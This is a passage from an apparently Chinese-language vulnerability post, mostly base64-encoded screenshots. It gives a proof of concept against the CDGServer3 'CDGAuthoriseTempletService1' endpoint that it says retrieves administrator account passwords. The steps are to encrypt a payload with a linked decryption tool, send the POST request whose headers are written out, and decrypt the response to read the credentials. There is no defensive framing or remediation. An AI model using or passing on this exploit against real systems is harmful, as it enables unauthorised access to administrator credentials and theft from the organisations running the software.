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
|
|||
|
|
<p blockindex=40>然后用加解密工具去加密</p>
|
|||
|
|
<p blockindex=41><a href=https://github.com/wafinfo/DecryptTools>https://github.com/wafinfo/DecryptTools</a></p>
|
|||
|
|
<p blockindex=42><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAACvAAAAbUCAYAAAAjF8MMAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzd+Xdd1Znw+e+z76R5tmXJtiZLHrGxwQTbDMY2gw2EkDAZSGeoJNXd9cNb1f1Wd6/VvXqt/Am9qmt1VRJIvW8RSAg4A4SQMIcQCIEweLaxJXm2LFuWNUv3nvP0D/ucIwkbbANVgfBcsDXcc/ZnP8/eZx+vfffdV7797f9JRUAQglBxDlBA/FfVEEUIw4C+vj5Onuzl8OFDnDp1ioaGWTQ0NFBTU0N5WTklJSXkirJkMzlSzpHLZhCXQgkRHGhUsAOAUBWngorGXPIVBBFQVVRBhOghOAEN1ZcTgkbPiYJKXIr/Iirmm2+++eabb7755ptvvvnmm2+++eabb7755ptvvvnmm2+++eabb7755ptvvvnmm2+++eabf8F+GCr5iQnCUJkYG2NsfILxsVH6BwboO32ao0ePcvz4cWprapk9Zy4zZsygtqYWl0r5umiY4E6EUME5RxiCkxC58857lShARdHQnyACYaAgcPLkCU70nuDY0SO0tLRyyZJLaGqe6ytZCCiEAaHGwQaoCqohohDi41SZ/J0P2KdKxCFhOCVD/oBQFFHAOZwqARrlXVCdTJqL0h2KJC3gdLIZQsApqDPffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN9/8C/QBUg5RxSG+zFQK54RUKg0oBw8eYvv27XR1d9HQMJsZM2dSW1NHOp3yZrRS2EnkRyHI3DntqnFlo4qJKoiQL0wwOjLE+PgYCxcu5LprriFXUky+kCc/Ps7p/n4GBwYZHRulkM8TBgFBIUBVKYQBTvyuvkS7+DIZl09e9Lf3fcV8hkGShPoGCAWcKmGUfEGjEpjynT8d8c9Gv5k81nzzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPM/xBcRRBwORZ1fsJtJpXGpFJlMmpKiYsoqKimvLKcolyOTyTE6OsLvXn6ZPXv2kMuWUFxSQi6VjXwIxS8JjkORuXNafUjiEA2J1ggzMjbM+PgoZaWlfOlLt1FRUc7w8AinT56i78xpRoaHyY9PEGiSERBQBfFFJxFptCLZRQeoCEiUwCTPgqhPRZLnKJlx5hWJgvDnSiSZb7755ptvvvnmm2+++eabb7755ptvvvnmm2+++eabb7755ptvvvnmm2+++eabb7755ptv/n+WL+LIZrOUlpVRWVFJ3Yw6SktKODMwyBNPPsngwBC5omKKcyWoCKKCSoBE+wGnKitqv6v4yuN8zYdHhxkbG2HhggXc8ZUvExTyHD10mMPHjnCqt5fhkREKQR5Nqu8rKFMiiXfxjX/nFL+NcXS0iBCGgghRYhR1TAb+vrKjHEfpFeIv5ptvvvnmm2+++eabb7755ptvvvnmm2+++eabb7755ptvvvnmm2+++eabb7755ptvvvnmm/+f6YOSLwSMDY8yODzAwMAgo2PjVFRUsHLlSgYHBzl27CihKplMBidT/RCnhB5xgioMjwyTnxjjqtWrWbfuOg4dOsjB7gMcOnqUgf4z5At5VP2qYhdG1RNNYtaocBUfdhS6X3WMItF/qholLwrf4Vcv69nJE8SXO+U5880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzf/L+ko+X2Cgf4CjRw5zsLuLY4ePsPbaq7lqzWomJsYZGRlGCSMfXOhIVVZUf9cXETI2OsLY+CirVl/JJUuXcPDAQU6dOsnpM/0EhYD4IVFlfKX8H1/xJFRAoq9TUqCAE0Qny3ASJyr6W+KkTP7e50QmjzPffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN9/8T4sPhGHA6PgYExN5xsfHaG+fRy6bo7u7CxEhk8niF/IKqcqK2u+iSr5QYGR0mIUL5nPFFSs5evAQp06dYnRkhDAIElw1ZqaIU74VFR+YaBKcEH0vgqJRkhRNzvTfqUyG7U+fDMx8880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzP80+gTKRz5Mv5CnkC8xra2NkdJTjPT2kUmlSKQdOcf5cYXR0iLKyEq699moOHzrE6TNnGBkdpRCEhAgIqCpONMKF+Nwp1UclqozGoSmTMWuUE/9kKjnGl+F0MjCVyTLNN998880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN9988803/7Pgh2HI+OgYp/vPcOzoEa65+mrKykoYGR0iVEEVHChj48OMj4+yaeNGTvaeZGJsnOGhQcLQ77wrUV198ZKQ8W80CkSjo0QUp5NhoZOrkFUFUQERQolKVJ+UOCESleufM998880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN99888033/zPjh8UAoaHhxgdG+PUyV42bdzIxPgYE+OjiAqpisqq746MDDOvfR7Nc+cyPDjA8d5egkKA3w4YkuqLJAFNfYj4p93kb3wVkgP9V41+jyiKkFJQ58uNC/VpEBxivvnmm2+++eabb7755ptvvvnmm2+++eabb7755ptvvvnmm2+++eabb7755ptvvvnmm2+++Z9JX8OQ8Yk8RcXFlJaUMDY2zqm+kxTlcqSKcqXfHRo+w6abbmJsfIyTfacZGx3xVRadUhmmBBTVWCYrJxCtKPaBqPMB+Ir4qCU+BRARH5JGX6M0+SAj13zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPM/o35BQ1LiyOZyNM2dy1tvv0Umm0Oqq+q0uqaSa6++mqGhIY4ePUKhECBKVFkSSKMCiQEFnBKqR84+xwcBGp+BqE45Jn5EZcmUI80333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTfffPPNN998880333zzzTf/M+6nMikaG2dTVlbK7195lb6+M6RE+O7ll19OSUkx/f2nGRkZ8UWKTilfUBSnAv5/r0lcLZKKySQZVUiIYkCcTJ7rw4mOZfLEOCDzzTfffPPNN998880333zzzTfffPPNN9988z8TvvC+cz9n8Ztvvvnmm2+++eabb7755ptvvvnmm2+++eZ/mE8I6XSaspJickVF7N+/j5SIfPeqK1cRhAGnT55iPF9AUBIHiaoT104RFdQpLnoOxO8bHFdMARdXUhEFER+w6GTgPiqicpKjzTfffPPNN998880333zzzTfffPPNN/8z4d98y60sW7aU8bEJBs+cQTm3f+XKL3DtNdewft06autm8t57ez+x+OvrZ3LXV+7i6muuZvny5Rw+dJjh4aGPHL8I3HXn3SxbfimLFyxi73t7CcPwE8//jBkz+fo3vs7sxtkU5Yro6en5T2//uU1NrF+3nmuvvoq1163jrbf+TBAUPjP97z/Lb5w9h69/4+vMbWqmvKKSo4cOgxMWLFjIjTfewIbrNnDlF77An978E4T/MfFvuOF6brjhRq5ctYqqqio6uzo/N/k333zzzTfffPPNN998880333zzzTfffPP/CnxAUCoqqiirLOfdrVtJV1fXEBAyOjrG6PgYDvzWvSpIqNH54rcPFtDoV6IyORcbBYUqoUSBquIUQpHJrYAV1GlUb/9Vo+pqVFGHmG+++eabb7755ptvvvnmm2+++eabb/6n3s/lcqxYthRJpVm8aDE//elP2bt3zzn9XEkxbR0dCMqSJUt45tnfUsgXPnb8TXPmcM/me8kVFRE/vva1r/HIT37M0cOHP1L8iGPBgoWo+B0Hip8pIZ8/84nnf81Va6irrqWutpa6uhns3r0ril/QUMnnJ2iZ10Zjwy
|
|||
|
|
发送 POC 可直接获取到管理员账户密码。</p>
|
|||
|
|
<pre blockindex=43><code class="hljs language-php">POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/<span class=hljs-number>1.1</span>
|
|||
|
|
|
|||
|
|
Host:
|
|||
|
|
|
|||
|
|
Cache-Control: max-age=<span class=hljs-number>0</span>
|
|||
|
|
|
|||
|
|
Sec-Ch-Ua: <span class=hljs-string>"Not:A-Brand"</span>;v=<span class=hljs-string>"99"</span>, <span class=hljs-string>"Chromium"</span>;v=<span class=hljs-string>"112"</span>
|
|||
|
|
|
|||
|
|
Sec-Ch-Ua-Mobile: ?<span class=hljs-number>0</span>
|
|||
|
|
|
|||
|
|
Sec-Ch-Ua-Platform: <span class=hljs-string>"Windows"</span>
|
|||
|
|
|
|||
|
|
Upgrade-Insecure-Requests: <span class=hljs-number>1</span>
|
|||
|
|
|
|||
|
|
User-Agent: Mozilla/<span class=hljs-number>5.0</span> (Windows NT <span class=hljs-number>10.0</span>; Win64; x64) AppleWebKit/<span class=hljs-number>537.36</span> (KHTML, like
|
|||
|
|
|
|||
|
|
Gecko) Chrome/<span class=hljs-number>112.0</span>.<span class=hljs-number>5615.138</span> Safari/<span class=hljs-number>537.36</span>
|
|||
|
|
|
|||
|
|
Accept:
|
|||
|
|
|
|||
|
|
text/html,application/xhtml+xml,application/xml;q=<span class=hljs-number>0.9</span>,image/avif,image/webp,image/apng,\*
|
|||
|
|
|
|||
|
|
/\*;q=<span class=hljs-number>0.8</span>,application/signed-exchange;v=b3;q=<span class=hljs-number>0.7</span>
|
|||
|
|
|
|||
|
|
Sec-Fetch-Site: none
|
|||
|
|
|
|||
|
|
Sec-Fetch-Mode: navigate
|
|||
|
|
|
|||
|
|
Sec-Fetch-User: ?<span class=hljs-number>1</span>
|
|||
|
|
|
|||
|
|
Sec-Fetch-Dest: document
|
|||
|
|
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
|
|||
|
|
Accept-Language: zh-CN,zh;q=<span class=hljs-number>0.9</span>
|
|||
|
|
|
|||
|
|
Connection: close
|
|||
|
|
|
|||
|
|
Content-Type: application/xml
|
|||
|
|
|
|||
|
|
Content-Length: <span class=hljs-number>510</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=44>加密数据</p>
|
|||
|
|
<p blockindex=45><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=46>最后将返回的结果进行解密,可看到账户密码信息</p>
|
|||
|
|
<p blockindex=47><img src="data:image/png;base64,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